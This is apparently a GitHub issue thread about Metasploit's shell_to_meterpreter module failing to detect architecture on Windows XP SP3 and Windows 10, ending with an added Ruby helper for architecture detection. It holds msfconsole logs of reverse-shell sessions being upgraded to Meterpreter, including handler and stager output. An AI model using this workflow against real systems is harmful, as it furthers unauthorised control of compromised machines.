Closed bcoles closed 1 year ago
same here
Same here. Any news?
Looking here https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/manage/shell_to_meterpreter.rb
At line 88, not sure if the syntax is correct.
Yep, getting the same issue while upgrading shell to Meterpreter
any solutions???
Cross-referencing: https://github.com/rapid7/metasploit-framework/pull/17336 - potentially better OS architecture detection would be a good follow on from the OS version detection API PR
same.
Id Name Type Information Connection
-- ---- ---- ----------- ----------
5 shell x64/windows Shell Banner: Microsoft Windows [_ 10.0.19 192.168.1.1:7777 -> 192.168.1.1:33333
045.2965] (c) Microsoft Corporatio... (192.168.1.1)
Also occurred on Windows 10 1903.
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 5
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
5 shell x64/windows Shell Banner: Microsof 10.65.106.99:4444 -> 10
t Windows [_ 10.0.1836 .65.106.99:47773 (172.1
2.30] ----- 6.1.139)
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 5
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) >
Vulnerable target env is Windows 10 1903 (CVE-2020-0796)
msf6 post(multi/manage/shell_to_meterpreter) > sessions 5
[*] Starting interaction with 5...
Shell Banner:
Microsoft Windows [_ 10.0.18362.30]
-----
C:\Windows\system32>
C:\Windows\system32>systeminfo
systeminfo
������: DESKTOP-O0U77NO
OS ����: Microsoft Windows 10 רҵ��
OS �汾: 10.0.18362 ��ȱ Build 18362
OS ������: Microsoft Corporation
OS ����: ��������վ
OS ��������: Multiprocessor Free
Also occurred on Windows 10 1903.
This is a different issue. #17896
Looks like this issue can be closed now, it was resolved by https://github.com/rapid7/metasploit-framework/pull/18062 which no longer uses wmic and currently detects the target architecture:
Target:
msf6 payload(windows/shell/reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...
Shell Banner:
'\\vmware-host\Shared Folders\Desktop'
CMD.EXE was started with the above path as the current directory.
UNC paths are not supported. Defaulting to Windows directory.
-----
C:\WINDOWS>systeminfo
systeminfo
Host Name: ZACH-F90A9C7F47
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Uniprocessor Free
Module working:
msf6 payload(windows/shell/reverse_tcp) > sessions -u -1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [-1]
[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.2.1:4433
[-] Powershell is not installed on the target.
[*] Command stager progress: 1.66% (1699/102108 bytes)
[*] Command stager progress: 3.33% (3398/102108 bytes)
[*] Command stager progress: 4.99% (5097/102108 bytes)
.... etc etc....
[*] Command stager progress: 96.51% (98542/102108 bytes)
[*] Command stager progress: 98.15% (100216/102108 bytes)
[*] Command stager progress: 99.78% (101888/102108 bytes)
[*] Sending stage (175686 bytes) to 192.168.2.135
[*] Command stager progress: 100.00% (102108/102108 bytes)
msf6 payload(windows/shell/reverse_tcp) >
[*] Meterpreter session 3 opened (192.168.2.1:4433 -> 192.168.2.135:1163) at 2023-10-23 10:32:18 -0500
Works as expected with the ENV detection:
`post/multi/manage/shell_to_meterpreter` fails on Windows XP SP3 x86 over a `windows/shell/reverse_tcp` session. Meterpreter supports Windows XP SP3.

Since #15864, `shell_to_meterpreter` attempts to use `wmic os get osarchitecture` which is not a valid WMIC query on XP SP3.

https://github.com/rapid7/metasploit-framework/blob/f043b121b32664f545c9d96ca43bb7fe84f6385a/modules/post/multi/manage/shell_to_meterpreter.rb#L84-L100
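The failure described in this issue and the environment-based approach mentioned in the replies, as an added example that is not part of the original thread and not Metasploit's own code. It assumes the shell can echo the standard Windows variables `PROCESSOR_ARCHITECTURE` and `PROCESSOR_ARCHITEW6432` (the thread does not say which variables the fix reads); helper names are hypothetical and all sample outputs are constructed.

```ruby
# Added example (not Metasploit code): OS architecture from cmd.exe output.
# Helper names are hypothetical; all sample strings are constructed.

ENV_ARCH = { 'X86' => 'x86', 'AMD64' => 'x64', 'IA64' => 'ia64', 'ARM64' => 'arm64' }.freeze

# cmd.exe echoes an undefined variable back literally ("%NAME%"),
# so treat that, blank output and unknown tokens as "no answer".
def env_token(raw)
  value = raw.to_s.strip.upcase
  return nil if value.empty? || value.start_with?('%')

  ENV_ARCH[value]
end

# PROCESSOR_ARCHITEW6432 is only defined for a 32-bit process on a 64-bit OS
# and then names the native architecture, so it takes precedence.
def arch_from_env(processor_architecture, processor_architew6432 = nil)
  env_token(processor_architew6432) || env_token(processor_architecture)
end

# Parse `wmic os get osarchitecture`. Only an exact "64-bit"/"32-bit" value
# under the expected header is accepted; an error reply (as on XP SP3, where
# the property does not exist) or any other string yields nil.
def arch_from_wmic(output)
  lines = output.to_s.lines.map(&:strip).reject(&:empty?)
  return nil unless lines.first.to_s.casecmp?('OSArchitecture')

  { '64-bit' => 'x64', '32-bit' => 'x86' }[lines[1].to_s.downcase]
end

# Prefer the environment, fall back to WMIC, and report :unknown
# instead of guessing when neither source gives a usable answer.
def detect_arch(env_arch:, env_w6432: nil, wmic_output: nil)
  arch_from_env(env_arch, env_w6432) || arch_from_wmic(wmic_output) || :unknown
end

# Constructed sample: XP SP3 x86, where the WMIC query is rejected.
XP_WMIC = "Node - HOSTNAME\r\nERROR:\r\nDescription = Invalid query\r\n".freeze
XP_RESULT = detect_arch(env_arch: "x86\r\n",
                        env_w6432: "%PROCESSOR_ARCHITEW6432%\r\n",
                        wmic_output: XP_WMIC)

# Constructed sample: 32-bit cmd.exe running under WOW64 on a 64-bit OS.
WOW64_RESULT = detect_arch(env_arch: 'x86', env_w6432: 'AMD64')
```

Returning `:unknown` rather than a default keeps an unparseable reply distinct from a genuinely unsupported architecture.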